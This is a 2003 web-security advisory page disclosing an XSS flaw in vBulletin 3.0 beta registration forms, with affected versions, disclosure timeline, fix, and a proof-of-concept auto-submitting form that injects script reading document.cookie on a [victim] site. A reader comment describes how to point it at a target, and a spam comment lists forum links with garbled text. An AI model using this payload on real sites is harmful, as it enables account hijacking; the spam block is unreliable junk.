VBulletin New Member XSS Vulnerability

06.08.2003

Okuyucu : 70.613
Günlük Okuyucu : 40,5
------------------------------------------------------
VBulletin New Member XSS Vulnerability
------------------------------------------------------
Any kind of XSS attacks possibility. With this vuln. an attacker could access other users/admins accounts.
Online URL : http://ferruh.mavituna.com/article.asp?256

------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application

Vendor & Demo;
www.vbulletin.com

------------------------------------------------------
Description;
------------------------------------------------------
In new member page (register.php), If you skip a required field system redirect you same form and fill fields automaticly that you enter before for a better form. In standard fields Vbulletin successfully handle script injections. But in optional fields like "Interests-Hobbies", "Biography", "Occupation" etc...

So you can execute any JS with these fields.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0 Beta 2 <> Beta 7

------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 3.0 Gamma
vBulletin 2.3.0
vBulletin 2.2.8 ...


------------------------------------------------------
Vendor Status and Patch;
------------------------------------------------------
26.01.2004, Problem fixed. 
To update vB3 Gamma or later.

------------------------------------------------------
History
------------------------------------------------------
Discovered : 15.07.2003
Vendor Informed : 29.07.2003
Publihed : 06.08.2003

------------------------------------------------------
Solution;
------------------------------------------------------
HTML Encoding like other inputs is OK.

------------------------------------------------------
Exploit Code;
------------------------------------------------------
[form action=&quot;http://[victim]/register.php?do=register&quot; method=&quot;post&quot; style=&quot;display:none&quot;]
	[input type=&quot;hidden&quot; name=&quot;s&quot; value=&quot;&quot; /]
	[input type=&quot;hidden&quot; name=&quot;regtype&quot; value=&quot;1&quot; /]
	[input type=&quot;text&quot; class=&quot;bginput&quot; name=&quot;field1&quot; value=&quot;&quot; size=&quot;25&quot; maxlength=&quot;250&quot; /]
	[input type=&quot;hidden&quot; name=&quot;url&quot; value=&quot;index.php&quot; /]
	[input type=&quot;hidden&quot; name=&quot;do&quot; value=&quot;addmember&quot; /]
[/form]
[script]
	//Code that will be executed
	var xss = &quot;\&quot;][script]alert(document&quot;+&quot;.cookie)[\/script]&quot;;
	document.forms[0].field1.value=xss;
	document.forms[0].submit();
[/script]

*Replace ([],&lt;&gt;)

Ferruh Mavituna
http://ferruh.mavituna.com
Web Application Security Specialist

Yorumlar

RSS Bu makalenin yorumlarını RSS ile takip et!

yaaa sunlari turkce yaz abi ya.

:) [ # | 19.12.2003 ]

th.x alot man for anfo

[ # | 06.02.2004 ]

gene bişi anLamadım falla

ErKan Cengiz [ # | 14.07.2004 ]

hea simdi anLadım bunu galiba boyle bu kodu metin editorunde duzenLiycez

[form action=&quot; http://[victim]/register.php?do=register&quot; method=&quot;post&quot; style=&quot;display:none&quot;]

victim yazan yere hedef site yazılacak

ye metin belgemiz web sayfası olarak kaydedilecek galiba daha sonrada acılınca sitede acık varsa girilecek gibi birsey fakat tam emin deilim bi ara denerim... sen eli opulecek adamsın ferruh :) sende cevherler var bunLarı bizede ogret

ErKan Cengiz [ # | 14.07.2004 ]


http://www.holidays-market.com/Forum/viewtopic.php?p=235962#235962 http://www.kosmolingua.de/alpha/forum/viewtopic.php?p=180197#180197 http://koelsche-toen.de/phpBB/viewtopic.php?p=26422#26422 http://www.motorwebben.se/Forum/viewtopic.php?p=313880#313880 http://www.borgernesdagsorden.dk/forum/viewtopic.php?p=78528#78528 Result: ïèêòîêîä äåøèôgîâàí;óñïåõ (ñ ïågâîé ñògàíèöû);BB-êîä íå gàáîòàåò;
http://ottchildeco.com/bbs////////view.php?DB=Custom_Center&num=310571&page=&start=0Result:GET-%F2%E0%E9%EC%E0%F3%F2%EE%E21;%F3%F1%EF%E5%F5%28%F1%EF%E5%F0%E2%EE%E9%F1%F2%F0%E0%ED%E8%F6%FB%29;BB-%EA%EE%E4%ED%E5%F0%E0%E1%EE%F2%E0%E5%F2; Result: GET-òàéìàóòîâ 1;óñïåõ (ñ ïågâîé ñògàíèöû);BB-êîä íå gàáîòàåò;
http://margueriterobertson.com/bb/viewtopic.php?p=62173#62173 http://www.tylerread.com/phpbb/viewtopic.php?p=206761#206761 http://acecop.com/phorum/viewtopic.php?p=128446#128446 http://www.astautodialer.com/phpBB2/viewtopic.php?p=99370#99370 http://datingbangalore.org/forum/viewtopic.php?p=110798#110798 http://ychat.co.za/bulitin/viewtopic.php?p=195260#195260 http://www.holtrain.com/Forum/viewtopic.php?p=37800#37800 http://www.bfpfilms.com/bullboard/viewtopic.php?p=106495#106495 http://www.adressedusite.com/forum/viewtopic.php?p=109794#109794 http://forum.fkt.no/viewtopic.php?p=317489#317489

duhheesty [ # | 35 gün, 30 dk ]

Yorum Ekle





Kullanılabilir Taglar : [<blockquote>] [<strong>] [<em>]

Diğer Yazılar

Neredeyim ?

Ferruh.Mavituna » Advisories » VBulletin New Member XSS Vulnerability

RSS Feed site statistics RSS Subscribers
Siteyi E-mail ile Takip Et

Ferruh Mavituna
© 2002-2007, Ferruh Mavituna

Sabit IP Adresi : 81.22.99.133, SSL Erişimi, Hakkında